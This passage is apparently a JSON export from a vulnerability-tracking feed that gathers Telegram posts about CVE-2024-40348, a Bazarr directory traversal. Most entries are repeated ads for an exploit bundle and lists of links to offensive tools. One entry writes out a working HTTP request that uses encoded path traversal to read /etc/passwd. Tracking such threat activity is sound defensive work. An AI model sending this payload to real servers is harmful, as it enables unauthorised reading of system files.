Hash.\n\n7x => CVE-2024-4577 - PHP [CGI] < Unauthenticated Command Injection.\n\n8x => CVE-2024-4836 - [Edito CMS] < Unauthenticated Sensitive Data Leak.\n\n9x => CVE-2024-32399 - RaidenMAILD [MailServer] < Unauthenticated Path Traversal.\n\nEnjoy;", "creation_timestamp": "2024-12-18T18:01:34.000000Z"}, {"uuid": "6bf456b8-0101-4c36-9541-7c4289f8f516", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1634", "content": "CvEploiterv2 x xWPv3 [Ultimate/Beast Software.]\n\n[The most advanced software for CV 2024 expl0its and WordPress vulnerabilities\n     with the latest version/method.]\n\n1x => CVE-2024-38761 - Wordpress [Zephyr Project Manager] < Unauthenticated Information Exposure.\n\n2x => CVE-2024-38759 - Wordpress [Search & Replace] < Unauthenticated PHP Object Injection.\n\n3x => CVE-2024-6313 - Wordpress [Gutenberg Forms] < Unauthenticated Arbitrary File Upload.\n\n4x => CVE-2024-6164 - Wordpress [Filter & Grids] < Unauthenticated Local File Inclusion.\n\n5x => CVE-2024-40348 - \n[Bazarr] < Unauthenticated Arbitrary File Read.\n\n6x => CVE-2024-4295 - Wordpress [Email Subscribers by Icegram Expres] < Unauthenticated SQL Injection via Hash.\n\n7x => CVE-2024-4577 - PHP [CGI] < Unauthenticated Command Injection.\n\n8x => CVE-2024-4836 - [Edito CMS] < Unauthenticated Sensitive Data Leak.\n\n9x => CVE-2024-32399 - RaidenMAILD [MailServer] < Unauthenticated Path Traversal.\n\nEnjoy;", "creation_timestamp": "2024-11-30T13:27:14.000000Z"}, {"uuid": "9f9aa399-14e1-44c6-afdf-32797ccf01c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7276", "content": "Tools - Hackers Factory \n\nApepe - Mobile application\u00a0 pentesting\n\nApepe is a Python tool developed to help pentesters and red teamers to easily get information from the target app. This tool will extract basic informations as the package name, if the app is signed and the development language...\n\ngithub.com/oppsec/Apepe\n\nBest App For Sql Injection\n\nhttps://github.com/darknethaxor/DH-HackBar\n\nBBRF-Client: The Bug Bounty Reconnaissance Framework (BBRF) can help you coordinate your reconnaissance workflows across multiple devices.\n\nhttps://github.com/honoki/bbrf-client/\n\nCVE-2024-40348 \n\nThis is a bulk scanning and exploitation tool for CVE-2024-40348: Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal. This vulnerability was discovered by 4rdr.\n\nhttps://github.com/bigb0x/CVE-2024-40348\n\nIt is a free and open-source tool used for image steganography, specifically for extracting hidden data from images. \n\nhttps://github.com/spipm/Depix \n\nDiscover more subdomains during your recon by extracting subdomains from TLS certificates. Integrate Cero into your recon automation for better results.\n\nhttps://github.com/glebarez/cero\n\nCRLFsuite - CRLF injection scanner \n\nThe most powerful CRLF injection (HTTP Response Splitting) scanner.\u00a0 \nhttps://github.com/Raghavd3v/CRLFsuite\n\nFound a subdomain running on Symfony debug mode. \n\nhttps://github.com/synacktiv/eos to get PHP variables and a lot more. \n\nTrying to find Origin IP check out this tool created to find IP behind WAF\nhttps://github.com/mmarting/unwaf \n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-13T01:42:51.000000Z"}, {"uuid": "30fde7ab-6be9-4034-8272-3d103a64bdbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1516", "content": "", "creation_timestamp": "2024-09-07T05:42:04.000000Z"}, {"uuid": "c7a018da-43e0-4de2-af9c-04feaf79b64f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/Unik4tsG4ng/6551", "content": "Tools - Hacks\n\nApepe - Mobile application\u00a0 pentesting\n\nApepe is a Python tool developed to help pentesters and red teamers to easily get information from the target app. This tool will extract basic informations as the package name, if the app is signed and the development language...\n\ngithub.com/oppsec/Apepe\n\nBest App For Sql Injection\n\nhttps://github.com/darknethaxor/DH-HackBar\n\nBBRF-Client: The Bug Bounty Reconnaissance Framework (BBRF) can help you coordinate your reconnaissance workflows across multiple devices.\n\nhttps://github.com/honoki/bbrf-client/\n\nCVE-2024-40348 \n\nThis is a bulk scanning and exploitation tool for CVE-2024-40348: Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal. This vulnerability was discovered by 4rdr.\n\nhttps://github.com/bigb0x/CVE-2024-40348\n\nIt is a free and open-source tool used for image steganography, specifically for extracting hidden data from images. \n\nhttps://github.com/spipm/Depix \n\nDiscover more subdomains during your recon by extracting subdomains from TLS certificates. Integrate Cero into your recon automation for better results.\n\nhttps://github.com/glebarez/cero\n\nCRLFsuite - CRLF injection scanner \n\nThe most powerful CRLF injection (HTTP Response Splitting) scanner.\u00a0 \nhttps://github.com/Raghavd3v/CRLFsuite\n\nFound a subdomain running on Symfony debug mode. \n\nhttps://github.com/synacktiv/eos to get PHP variables and a lot more. \n\nTrying to find Origin IP check out this tool created to find IP behind WAF\n\nhttps://github.com/mmarting/unwaf", "creation_timestamp": "2024-08-13T11:32:52.000000Z"}, {"uuid": "5252e38c-7552-413d-bd07-f6dc400975f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7009", "content": "Tools - Hackers Factory \n\nAmoloHT/TTWAF: \u300c\ud83e\uddf1\u300dTest a list of payloads and see if you can bypass it.\n\nhttps://github.com/AmoloHT/TTWAF\n\nOWASP/www-project-netryx: Next level Java web security framework. \n\nhttps://github.com/OWASP/www-project-netryx\n\nPrivFu/TokenAssignor at main daem0nc0re/PrivFu.\n\nhttps://github.com/daem0nc0re/PrivFu/tree/main/TokenAssignor\n\nRPISEC/MBE: Course materials for Modern Binary Exploitation by RPISEC\n\nhttps://github.com/RPISEC/MBE\n\nBigb0x/CVE-2024-40348: POC for CVE-2024-40348. Will attempt to read /etc/passwd from target\n\nhttps://github.com/bigb0x/CVE-2024-40348\n\nPumpbin/pumpbin: \ud83c\udf83 PumpBin is an Implant Generation Platform.\n\nhttps://github.com/pumpbin/pumpbin\n\nBellingcat/name-variant-search: A tool for searching common variations of a human name\n\nhttps://github.com/bellingcat/name-variant-search\n\nMegadose/nqntnqnqmb: Allows you to retrieve information on linkedin profiles, companies on linkedin and search on linkedin companies/persons\n\nhttps://github.com/megadose/nqntnqnqmb\n\nThis cheat sheet contains common enumeration and attack methods for Windows Active Directory with the use of powershell.\n\nhttps://github.com/drak3hft7/Cheat-Sheet---Active-Directory\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-24T08:32:41.000000Z"}, {"uuid": "e9c71d44-e30c-4e1b-96bd-a11b25869855", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1615", "content": "CvEploiterv2 x xWPv3 [Ultimate/Beast Software.]\n\n[The most advanced software for CV 2024 expl0its and WordPress vulnerabilities\n     with the latest version/method.]\n\n1x => CVE-2024-38761 - Wordpress [Zephyr Project Manager] < Unauthenticated Information Exposure.\n\n2x => CVE-2024-38759 - Wordpress [Search & Replace] < Unauthenticated PHP Object Injection.\n\n3x => CVE-2024-6313 - Wordpress [Gutenberg Forms] < Unauthenticated Arbitrary File Upload.\n\n4x => CVE-2024-6164 - Wordpress [Filter & Grids] < Unauthenticated Local File Inclusion.\n\n5x => CVE-2024-40348 - \n[Bazarr] < Unauthenticated Arbitrary File Read.\n\n6x => CVE-2024-4295 - Wordpress [Email Subscribers by Icegram Expres] < Unauthenticated SQL Injection via Hash.\n\n7x => CVE-2024-4577 - PHP [CGI] < Unauthenticated Command Injection.\n\n8x => CVE-2024-4836 - [Edito CMS] < Unauthenticated Sensitive Data Leak.\n\n9x => CVE-2024-32399 - RaidenMAILD [MailServer] < Unauthenticated Path Traversal.\n\nEnjoy;", "creation_timestamp": "2024-10-18T12:25:41.000000Z"}, {"uuid": "31decaa5-1a38-4bfa-8987-a5a73b83d2c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1602", "content": "CvEploiterv2 x xWPv3 [Ultimate/Beast Software.]\n\n[The most advanced software for CV 2024 expl0its and WordPress vulnerabilities\n     with the latest version/method.]\n\n1x => CVE-2024-38761 - Wordpress [Zephyr Project Manager] < Unauthenticated Information Exposure.\n\n2x => CVE-2024-38759 - Wordpress [Search & Replace] < Unauthenticated PHP Object Injection.\n\n3x => CVE-2024-6313 - Wordpress [Gutenberg Forms] < Unauthenticated Arbitrary File Upload.\n\n4x => CVE-2024-6164 - Wordpress [Filter & Grids] < Unauthenticated Local File Inclusion.\n\n5x => CVE-2024-40348 - \n[Bazarr] < Unauthenticated Arbitrary File Read.\n\n6x => CVE-2024-4295 - Wordpress [Email Subscribers by Icegram Expres] < Unauthenticated SQL Injection via Hash.\n\n7x => CVE-2024-4577 - PHP [CGI] < Unauthenticated Command Injection.\n\n8x => CVE-2024-4836 - [Edito CMS] < Unauthenticated Sensitive Data Leak.\n\n9x => CVE-2024-32399 - RaidenMAILD [MailServer] < Unauthenticated Path Traversal.\n\nEnjoy;", "creation_timestamp": "2024-09-13T16:57:01.000000Z"}, {"uuid": "aa879c29-7eb8-42dc-87d7-c80b536c7a0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1580", "content": "CvEploiterv2 x xWPv3 [Ultimate/Beast Software.]\n\n[The most advanced software for CV 2024 expl0its and WordPress vulnerabilities\n     with the latest version/method.]\n\n1x => CVE-2024-38761 - Wordpress [Zephyr Project Manager] < Unauthenticated Information Exposure.\n\n2x => CVE-2024-38759 - Wordpress [Search & Replace] < Unauthenticated PHP Object Injection.\n\n3x => CVE-2024-6313 - Wordpress [Gutenberg Forms] < Unauthenticated Arbitrary File Upload.\n\n4x => CVE-2024-6164 - Wordpress [Filter & Grids] < Unauthenticated Local File Inclusion.\n\n5x => CVE-2024-40348 - \n[Bazarr] < Unauthenticated Arbitrary File Read.\n\n6x => CVE-2024-4295 - Wordpress [Email Subscribers by Icegram Expres] < Unauthenticated SQL Injection via Hash.\n\n7x => CVE-2024-4577 - PHP [CGI] < Unauthenticated Command Injection.\n\n8x => CVE-2024-4836 - [Edito CMS] < Unauthenticated Sensitive Data Leak.\n\n9x => CVE-2024-32399 - RaidenMAILD [MailServer] < Unauthenticated Path Traversal.\n\nEnjoy;", "creation_timestamp": "2024-08-31T13:09:22.000000Z"}, {"uuid": "c4c80965-e0d3-4418-bd55-55c5cbf890dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1554", "content": "CvEploiterv2 x xWPv3 [Ultimate/Beast Software.]\n\n[The most advanced software for CV 2024 expl0its and WordPress vulnerabilities\n     with the latest version/method.]\n\n1x => CVE-2024-38761 - Wordpress [Zephyr Project Manager] < Unauthenticated Information Exposure.\n\n2x => CVE-2024-38759 - Wordpress [Search & Replace] < Unauthenticated PHP Object Injection.\n\n3x => CVE-2024-6313 - Wordpress [Gutenberg Forms] < Unauthenticated Arbitrary File Upload.\n\n4x => CVE-2024-6164 - Wordpress [Filter & Grids] < Unauthenticated Local File Inclusion.\n\n5x => CVE-2024-40348 - \n[Bazarr] < Unauthenticated Arbitrary File Read.\n\n6x => CVE-2024-4295 - Wordpress [Email Subscribers by Icegram Expres] < Unauthenticated SQL Injection via Hash.\n\n7x => CVE-2024-4577 - PHP [CGI] < Unauthenticated Command Injection.\n\n8x => CVE-2024-4836 - [Edito CMS] < Unauthenticated Sensitive Data Leak.\n\n9x => CVE-2024-32399 - RaidenMAILD [MailServer] < Unauthenticated Path Traversal.\n\nEnjoy;", "creation_timestamp": "2024-08-30T06:52:02.000000Z"}, {"uuid": "d5ef32cb-3315-4613-881c-9e6f73ed844d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1531", "content": "CvEploiterv2 x xWPv3 [Ultimate/Beast Software.]\n\n[The most advanced software for CV 2024 expl0its and WordPress vulnerabilities\n     with the latest version/method.]\n\n1x => CVE-2024-38761 - Wordpress [Zephyr Project Manager] < Unauthenticated Information Exposure.\n\n2x => CVE-2024-38759 - Wordpress [Search & Replace] < Unauthenticated PHP Object Injection.\n\n3x => CVE-2024-6313 - Wordpress [Gutenberg Forms] < Unauthenticated Arbitrary File Upload.\n\n4x => CVE-2024-6164 - Wordpress [Filter & Grids] < Unauthenticated Local File Inclusion.\n\n5x => CVE-2024-40348 - \n[Bazarr] < Unauthenticated Arbitrary File Read.\n\n6x => CVE-2024-4295 - Wordpress [Email Subscribers by Icegram Expres] < Unauthenticated SQL Injection via Hash.\n\n7x => CVE-2024-4577 - PHP [CGI] < Unauthenticated Command Injection.\n\n8x => CVE-2024-4836 - [Edito CMS] < Unauthenticated Sensitive Data Leak.\n\n9x => CVE-2024-32399 - RaidenMAILD [MailServer] < Unauthenticated Path Traversal.\n\nEnjoy;", "creation_timestamp": "2024-09-07T05:42:04.000000Z"}, {"uuid": "99feb6e8-5f3a-4660-909f-9e021d22df27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/GhostClanInt/25337", "content": "Tools - Hackers Factory \n\nAmoloHT/TTWAF: \u300c\ud83e\uddf1\u300dTest a list of payloads and see if you can bypass it.\n\nhttps://github.com/AmoloHT/TTWAF\n\nOWASP/www-project-netryx: Next level Java web security framework. \n\nhttps://github.com/OWASP/www-project-netryx\n\nPrivFu/TokenAssignor at main daem0nc0re/PrivFu.\n\nhttps://github.com/daem0nc0re/PrivFu/tree/main/TokenAssignor\n\nRPISEC/MBE: Course materials for Modern Binary Exploitation by RPISEC\n\nhttps://github.com/RPISEC/MBE\n\nBigb0x/CVE-2024-40348: POC for CVE-2024-40348. Will attempt to read /etc/passwd from target\n\nhttps://github.com/bigb0x/CVE-2024-40348\n\nPumpbin/pumpbin: \ud83c\udf83 PumpBin is an Implant Generation Platform.\n\nhttps://github.com/pumpbin/pumpbin\n\nBellingcat/name-variant-search: A tool for searching common variations of a human name\n\nhttps://github.com/bellingcat/name-variant-search\n\nMegadose/nqntnqnqmb: Allows you to retrieve information on linkedin profiles, companies on linkedin and search on linkedin companies/persons\n\nhttps://github.com/megadose/nqntnqnqmb\n\nThis cheat sheet contains common enumeration and attack methods for Windows Active Directory with the use of powershell.\n\nhttps://github.com/drak3hft7/Cheat-Sheet---Active-Directory\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-24T08:13:30.000000Z"}, {"uuid": "78d2af46-d27d-4e51-aeb3-abf38213fbb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "exploited", "source": "https://t.me/Unik4tsG4ng/9792", "content": "This is a bulk scanning and exploitation tool for CVE-2024-40348, Bazaar v1.4.3 and prior. Will attempt to read /etc/passwd from target.\n\nhttps://github.com/bigb0x/CVE-2024-40348", "creation_timestamp": "2024-10-25T04:22:47.000000Z"}, {"uuid": "e749bf14-22fc-4e6c-8416-d65c4697fc8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2852", "content": "https://github.com/bigb0x/CVE-2024-40348\n\nPOC for CVE-2024-40348. Will attempt to read /etc/passwd from target\n#github #poc", "creation_timestamp": "2024-07-25T13:56:26.000000Z"}, {"uuid": "67f86c7d-9225-4ee0-86f2-6092182e6b07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "exploited", "source": "https://t.me/CNArsenal/2854", "content": "CVE-2024-40348\n\nGET /api/swaggerui/static/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1\n\netc/passwd\n\n#exploit #poc", "creation_timestamp": "2024-07-26T10:33:10.000000Z"}, {"uuid": "230bcc4d-4a74-408c-a019-2e7cbfb881fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10884", "content": "#exploit\n1. CVE-2024-40348:\nUnauth directory traversal in Bazaar 1.4.3\nhttps://github.com/bigb0x/CVE-2024-40348\n\n2. CVE-2024-39907:\nSQLi in Linux 1Panel\nhttps://github.com/1Panel-dev/1Panel/security/advisories/GHSA-5grx-v727-qmq6", "creation_timestamp": "2024-07-27T12:01:41.000000Z"}, {"uuid": "9646ee16-788e-4755-8e7c-8eb73045ab7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "exploited", "source": "Telegram/KWFKedzBf7DpHW3u-VGxtsq0YreIfyiSuhvo1jLiT81XBdYB", "content": "", "creation_timestamp": "2024-07-27T06:59:39.000000Z"}, {"uuid": "a17622c4-d893-4126-8aa5-ddcb5385c028", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-40348", "type": "seen", "source": "https://t.me/HackerInvestigationZone/9", "content": "\ud83d\udea8_CvEploiterv2 x xWPv3 Ultimate/Beast Software\n\n\ud83c\udfafThe most advanced software for CV 2024 expl0its and WordPress vulnerabilities\n\u00a0\u00a0\u00a0\u00a0 with the latest version/method.]\n\n\u2699\ufe0fCVE-2024-38761 - Wordpress [Zephyr Project Manager] < Unauthenticated Information Exposure.\n\n \u2699\ufe0fCVE-2024-38759 - Wordpress [Search & Replace] < Unauthenticated PHP Object Injection.\n\n\u2699\ufe0fCVE-2024-6313 - Wordpress [Gutenberg Forms] < Unauthenticated Arbitrary File Upload.\n\n\u2699\ufe0fCVE-2024-6164 - Wordpress [Filter & Grids] < Unauthenticated Local File Inclusion.\n\n\u2699\ufe0fCVE-2024-40348 - \n[Bazarr] < Unauthenticated Arbitrary File Read.\n\n\u2699\ufe0f#CVE-2024-4295 - Wordpress [Email Subscribers by Icegram Expres] < Unauthenticated SQL Injection via Hash.\n\n\u2699\ufe0fCVE-2024-4577 - PHP [CGI] < Unauthenticated Command Injection.\n\n\u2699\ufe0fCVE-2024-4836 - [Edito CMS] < Unauthenticated Sensitive Data Leak.\n\n\u2699\ufe0fCVE-2024-32399 - RaidenMAILD [MailServer] < Unauthenticated Path Traversal.\n\n#Investigation_of_hacking \n#Cyber_Security_News\n#codeb0ss", "creation_timestamp": "2024-11-12T20:45:56.000000Z"}]}